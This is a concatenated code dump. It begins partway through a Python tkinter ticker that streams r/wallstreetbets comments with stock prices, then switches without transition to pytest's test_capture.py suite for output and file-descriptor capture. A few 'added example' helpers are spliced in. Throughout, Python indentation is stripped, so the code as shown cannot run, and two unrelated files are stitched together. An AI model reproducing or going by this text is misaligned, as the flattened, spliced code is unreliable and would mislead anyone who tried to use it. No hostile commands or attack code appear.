comment_dict[comment]['author'] = comment_dict[comment]['author'][1:]
else:
comment_dict[comment]['body'] = comment_dict[comment]['body'][1:]
else:
del comment_dict[comment]
marquee.tag_bind('link', '<Button-1>', showLink)
marquee.tag_bind('author', '<Button-1>', showLink)
marquee.tag_config("author", foreground=themecolors[theme]['user'])
marquee.tag_config("author_is_mod", foreground=themecolors[theme]['mods'])
root.after(tick_rate, lambda:create_ticker(i))
def get_comments():
print("updating")
global stream
global old_comments
global comment_dict
global comments_in_queue
comment_dict['welcome'] = {}
comment_dict['welcome']['author'] = " /u/MSMSP: "
comment_dict['welcome']['author_link'] = "https://old.reddit.com/u/MSMSP"
comment_dict['welcome']['original_author'] = ""
comment_dict['welcome']['link'] = "https://old.reddit.com/r/wallstreetbets"
comment_dict['welcome']['created_utc'] = ''
comment_dict['welcome']['body'] = " Welcome to the /r/Wallstreetbets Ticker! Now loading comments and stock prices..... ###"
for comment in reddit.subreddit('wallstreetbets').stream.comments():
if hasattr(comment, 'body') and comment.created_utc > (time.time() -300) and comment.id not in old_comments and comment.link_id in stickies:
old_comments.append(comment.id)
body = comment.body.replace("\r"," ")
body = body.replace("\n"," ")
body = body.strip()
for stock in stocks:
if stock in stock_dict:
if stock in body:
#print("Found stock ticker!")
if stock_dict[stock]['regularMarketChangePercent'] > 0:
body = body.replace(stock, stock + " (" + str(stock_dict[stock]['regularMarketPrice']) + " ⮝" +str(round(stock_dict[stock]['regularMarketChangePercent']*100,2)) + "%" ") ")
else:
body = body.replace(stock, stock + " (" + str(stock_dict[stock]['regularMarketPrice']) + " ⮟" +str(round(stock_dict[stock]['regularMarketChangePercent']*100,2)) + "%" ") ")
comment_dict[comment.id] = {}
comment_dict[comment.id]['author'] = " /u/" + str(comment.author) + ": "
comment_dict[comment.id]['original_author'] = str(comment.author)
comment_dict[comment.id]['author_link'] = "https://old.reddit.com/u/" + str(comment.author)
comment_dict[comment.id]['link'] = comment.link_permalink + comment.id
comment_dict[comment.id]['created_utc'] = comment.created_utc
if len(body) < 500:
comment_dict[comment.id]['body'] = body + " ###"
else:
comment_dict[comment.id]['body'] = body[0:500] + "... blah blah blah ###"
#print("blabber detected!")
#print(body[:10]+"...")
comments_in_queue = len(comment_dict)
#print(comments_in_queue)
def find_all(a_str, sub):
start = 0
while True:
start = a_str.find(sub, start)
if start == -1: return
yield start
end = a_str.find(':', start)
yield end
start += len(sub)
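# --- added example: what find_all yields (illustrative input) ---
# For every occurrence of sub, the generator yields the index where sub starts
# followed by the index of the next ':' after it.
def _example_find_all():
    positions = list(find_all("AAPL: 100, TSLA: 200", "TSLA"))
    assert positions == [11, 15]        # start of "TSLA" and the ':' after it
    return positions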
def get_stock_prices():
global stock_dict
global stream
while True:
print("#### UPDATING STOCK PRICES")
current = YahooFinancials(stocks)
stock_dict = current.get_stock_price_data()
print("#### DONE UPDATING STOCK PRICES")
time.sleep(600)
get_mods()
if __name__ == '__main__':
threading.Thread(target=check_stickies).start()
threading.Thread(target=get_comments).start()
threading.Thread(target=get_stock_prices).start()
create_ticker(i)
root.mainloop()
|
test_capture.py
|
import contextlib
import io
import os
import pickle
import subprocess
import sys
import textwrap
from io import StringIO
from io import UnsupportedOperation
from typing import List
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.main import ExitCode
# note: py.io capture tests were copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
needsosdup = pytest.mark.skipif(
not hasattr(os, "dup"), reason="test needs os.dup, not available on this platform"
)
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
class TestCaptureManager:
def test_getmethod_default_no_fd(self, monkeypatch):
from _pytest.capture import pytest_addoption
from _pytest.config.argparsing import Parser
parser = Parser()
pytest_addoption(parser)
default = parser._groups[0].options[0].default
assert default == ("fd" if hasattr(os, "dup") else "sys")
parser = Parser()
monkeypatch.delattr(os, "dup", raising=False)
pytest_addoption(parser)
assert parser._groups[0].options[0].default == "sys"
@pytest.mark.parametrize(
"method", ["no", "sys", pytest.param("fd", marks=needsosdup)]
)
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@needsosdup
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
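# --- added sketch: the global capture lifecycle exercised above ---
# This mirrors the call sequence from test_capturing_basic_api using the
# internal CaptureManager API; it is illustrative only, not a public interface.
def _example_capture_lifecycle():
    capman = CaptureManager("sys")
    capman.start_global_capturing()
    capman.suspend_global_capture()
    capman.resume_global_capture()
    print("captured")
    capman.suspend_global_capture()
    out, err = capman.read_global_capture()
    capman.stop_global_capturing()
    return out, err                     # ("captured\n", "")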
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
from _pytest import capture
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"*capsys*capfd*same*time*",
"*test_two*",
"*capfd*capsys*same*time*",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
@needsosdup
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@needsosdup
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsysbinary):
import sys
# some likely un-decodable bytes
sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
out, err = capsysbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
@needsosdup
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_fdfuncarg_skips_on_no_osdup(testdir):
testdir.makepyfile(
"""
import os
if hasattr(os, 'dup'):
del os.dup
def test_hello(capfd):
pass
"""
)
result = testdir.runpytest_subprocess("--capture=no")
result.stdout.fnmatch_lines(["*1 skipped*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(IOError, f.read)
pytest.raises(IOError, f.readlines)
iter_f = iter(f)
pytest.raises(IOError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.fixture
def tmpfile(testdir):
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@needsosdup
def test_dupfile(tmpfile) -> None:
flist = [] # type: List[TextIO]
for i in range(5):
nf = capture.safe_text_dupfile(tmpfile, "wb")
assert nf != tmpfile
assert nf.fileno() != tmpfile.fileno()
assert nf not in flist
print(i, end="", file=nf)
flist.append(nf)
fname_open = flist[0].name
assert fname_open == repr(flist[0].buffer)
for i in range(5):
f = flist[i]
f.close()
fname_closed = flist[0].name
assert fname_closed == repr(flist[0].buffer)
assert fname_closed != fname_open
tmpfile.seek(0)
s = tmpfile.read()
assert "01234" in repr(s)
tmpfile.close()
assert fname_closed == repr(flist[0].buffer)
def test_dupfile_on_bytesio():
bio = io.BytesIO()
f = capture.safe_text_dupfile(bio, "wb")
f.write("hello")
assert bio.getvalue() == b"hello"
assert "BytesIO object" in f.name
def test_dupfile_on_textio():
sio = StringIO()
f = capture.safe_text_dupfile(sio, "wb")
f.write("hello")
assert sio.getvalue() == "hello"
assert not hasattr(f, "name")
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
pytestmark = needsosdup
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2)
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(IOError, sys.stdin.read)
class TestStdCaptureFD(TestStdCapture):
pytestmark = needsosdup
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
pytestmark = needsosdup
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert repr(cap.out) == "<FDCapture 1 oldfd=None _state=None>"
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert repr(cap.err) == "<FDCapture 2 oldfd=None _state=None>"
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert repr(cap.in_) == "<FDCapture 0 oldfd=None _state=None>"
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@needsosdup
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
@needsosdup
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
if method == "StdCaptureFD" and not hasattr(os, "dup"):
pytest.skip("need os.dup")
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
